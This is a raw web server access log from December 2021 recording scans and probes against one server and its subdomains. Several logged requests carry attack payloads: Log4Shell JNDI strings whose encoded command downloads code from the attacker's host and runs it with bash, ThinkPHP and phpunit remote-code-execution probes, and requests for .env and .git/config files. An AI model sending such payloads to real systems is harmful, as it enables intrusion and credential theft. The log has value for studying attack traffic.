Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:18:38:40 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:18:38:40 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:19:00:26 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:19:00:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [16/Dec/2021:19:21:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.140.188.2] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [16/Dec/2021:19:56:48 +0000] 444 - GET https tw.moralanimal.net "/" [Client 34.77.162.7] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [16/Dec/2021:19:59:48 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:19:59:48 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:20:08:02 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:20:32:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Dec/2021:20:49:04 +0000] 444 - GET https mailer.moralanimal.net "/" [Client 34.77.162.1] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [16/Dec/2021:21:11:49 +0000] 444 - GET https localhost "/" [Client 170.106.174.246] [Length 0] [Gzip -] "curl/7.64.1" "-" [16/Dec/2021:21:11:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.114.158.1] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [16/Dec/2021:21:16:44 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:21:47:06 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:21:57:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Dec/2021:22:50:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.8] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Dec/2021:22:56:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:23:20:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.60] [Length 0] [Gzip -] "-" "-" [16/Dec/2021:23:20:25 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "-" "-" [16/Dec/2021:23:32:37 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:23:32:37 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:23:33:03 +0000] 444 - GET https mail2.moralanimal.net "/" [Client 34.96.130.20] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [16/Dec/2021:23:51:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Dec/2021:23:59:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Dec/2021:00:05:22 +0000] 400 - POST https localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:01:31:55 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.86.35.3] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [17/Dec/2021:02:02:53 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [17/Dec/2021:02:42:15 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:02:42:15 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:02:54:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.69] [Length 0] [Gzip -] "-" "-" [17/Dec/2021:03:20:47 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:03:20:48 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:04:14:05 +0000] 400 - - http localhost "-" [Client 79.124.62.106] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:04:21:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Dec/2021:04:24:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 86.109.208.194] [Length 0] [Gzip -] "curl/7.58.0" "-" [17/Dec/2021:04:24:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 86.109.208.194] [Length 0] [Gzip -] "curl/7.58.0" "-" [17/Dec/2021:04:24:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 86.109.208.194] [Length 0] [Gzip -] "curl/7.58.0" "-" [17/Dec/2021:04:24:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 86.109.208.194] [Length 0] [Gzip -] "curl/7.58.0" "-" [17/Dec/2021:06:14:45 +0000] 444 - GET https mailrelay.moralanimal.net "/" [Client 34.77.162.13] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [17/Dec/2021:06:50:22 +0000] 400 - GET http 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Dec/2021:06:50:22 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Dec/2021:07:34:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Dec/2021:07:54:22 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.106] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Dec/2021:08:04:16 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.40] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Dec/2021:08:52:00 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:08:52:00 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:09:43:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [17/Dec/2021:09:43:05 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [17/Dec/2021:11:14:40 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:11:14:40 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:11:35:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.122] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Dec/2021:11:35:42 +0000] 444 - GET https 64.22.31.253 "/fuel" [Client 23.90.160.122] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Dec/2021:12:08:41 +0000] 444 - GET https mx1.moralanimal.net "/" [Client 34.77.162.12] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [17/Dec/2021:12:28:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Dec/2021:12:32:02 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Dec/2021:12:32:02 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Dec/2021:12:40:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.214.29] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Dec/2021:12:40:44 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Dec/2021:12:43:29 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:13:00:04 +0000] 444 - GET https antispam.moralanimal.net "/" [Client 34.86.35.12] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [17/Dec/2021:13:13:27 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Dec/2021:13:16:19 +0000] 444 - GET https mx4.moralanimal.net "/" [Client 34.77.162.18] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [17/Dec/2021:13:23:05 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:13:23:06 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:14:11:16 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [17/Dec/2021:14:24:07 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:14:24:08 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:14:43:47 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Dec/2021:14:51:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Dec/2021:15:47:32 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [17/Dec/2021:16:04:08 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 156.146.50.171] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" "-" [17/Dec/2021:16:28:01 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:16:28:01 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Dec/2021:16:43:05 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Dec/2021:16:50:31 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.247.21.18] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Dec/2021:17:05:37 +0000] 444 - GET https mx0.moralanimal.net "/" [Client 34.77.162.29] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [17/Dec/2021:17:08:09 +0000] 444 - GET https 64.22.31.253 "/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-ftxkrwglkq7runnf%7D" [Client 45.83.65.43] [Length 0] [Gzip -] "${${::-j}ndi:dns://45.83.64.1/securityscan-57m77ldcgabdn6eo}" "${${::-j}ndi:dns://45.83.64.1/securityscan-rlhxkfmsixpp3qse}" [17/Dec/2021:17:16:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.8] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Dec/2021:17:22:07 +0000] 444 - GET https ns2.moralanimal.net "/" [Client 34.96.130.11] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [17/Dec/2021:17:23:07 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.133.109.163] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Dec/2021:17:32:37 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Dec/2021:18:31:21 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Dec/2021:18:46:07 +0000] 444 - POST https 64.22.31.253 "/_ignition/execute-solution" [Client 1.15.76.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" "-" [17/Dec/2021:18:46:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 1.15.76.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" "-" [17/Dec/2021:18:46:09 +0000] 444 - GET https 64.22.31.253 "/script" [Client 1.15.76.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" "-" [17/Dec/2021:18:46:10 +0000] 444 - GET https 64.22.31.253 "/manager/html" [Client 1.15.76.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" "-" [17/Dec/2021:18:46:11 +0000] 444 - GET https 64.22.31.253 "/wp-login.php" [Client 1.15.76.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" "-" [17/Dec/2021:18:46:12 +0000] 444 - GET https 64.22.31.253 "/?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=w3g99vjd" [Client 1.15.76.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" "-" [17/Dec/2021:18:46:13 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 1.15.76.31] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" "-" [17/Dec/2021:18:48:13 +0000] 444 - GET https newmail.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [17/Dec/2021:19:11:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [17/Dec/2021:19:29:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.165] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [17/Dec/2021:19:44:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [17/Dec/2021:19:57:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Dec/2021:20:54:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Dec/2021:21:08:48 +0000] 400 - POST https localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:21:25:30 +0000] 444 - GET https zmail.moralanimal.net "/" [Client 34.86.35.12] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [17/Dec/2021:21:52:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Dec/2021:22:02:41 +0000] 400 - - http localhost "-" [Client 206.189.118.64] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:02:41 +0000] 400 - - http localhost "-" [Client 206.189.118.64] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:02:41 +0000] 400 - POST http 192.168.204.159 "/" [Client 206.189.118.64] [Length 252] [Gzip -] "WinHttpClient" "-" [17/Dec/2021:22:02:42 +0000] 400 - GET http 192.168.204.111 "/3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000" [Client 206.189.118.64] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "-" [17/Dec/2021:22:02:43 +0000] 400 - - http localhost "-" [Client 137.184.201.247] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:02:43 +0000] 400 - - http localhost "-" [Client 137.184.201.247] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:02:43 +0000] 400 - POST http 192.168.204.159 "/" [Client 137.184.201.247] [Length 252] [Gzip -] "WinHttpClient" "-" [17/Dec/2021:22:02:43 +0000] 400 - GET http 192.168.204.111 "/3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000" [Client 137.184.201.247] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "-" [17/Dec/2021:22:02:45 +0000] 400 - - http localhost "-" [Client 138.68.173.83] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:02:45 +0000] 400 - - http localhost "-" [Client 138.68.173.83] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:02:45 +0000] 400 - POST http 192.168.204.159 "/" [Client 138.68.173.83] [Length 252] [Gzip -] "WinHttpClient" "-" [17/Dec/2021:22:02:46 +0000] 400 - GET http 192.168.204.111 "/3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000" [Client 138.68.173.83] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "-" [17/Dec/2021:22:06:03 +0000] 400 - - http localhost "-" [Client 137.184.201.247] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:06:03 +0000] 400 - - http localhost "-" [Client 137.184.201.247] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:06:03 +0000] 400 - POST http 192.168.204.159 "/" [Client 137.184.201.247] [Length 252] [Gzip -] "WinHttpClient" "-" [17/Dec/2021:22:06:03 +0000] 400 - GET http 192.168.204.111 "/3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000" [Client 137.184.201.247] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "-" 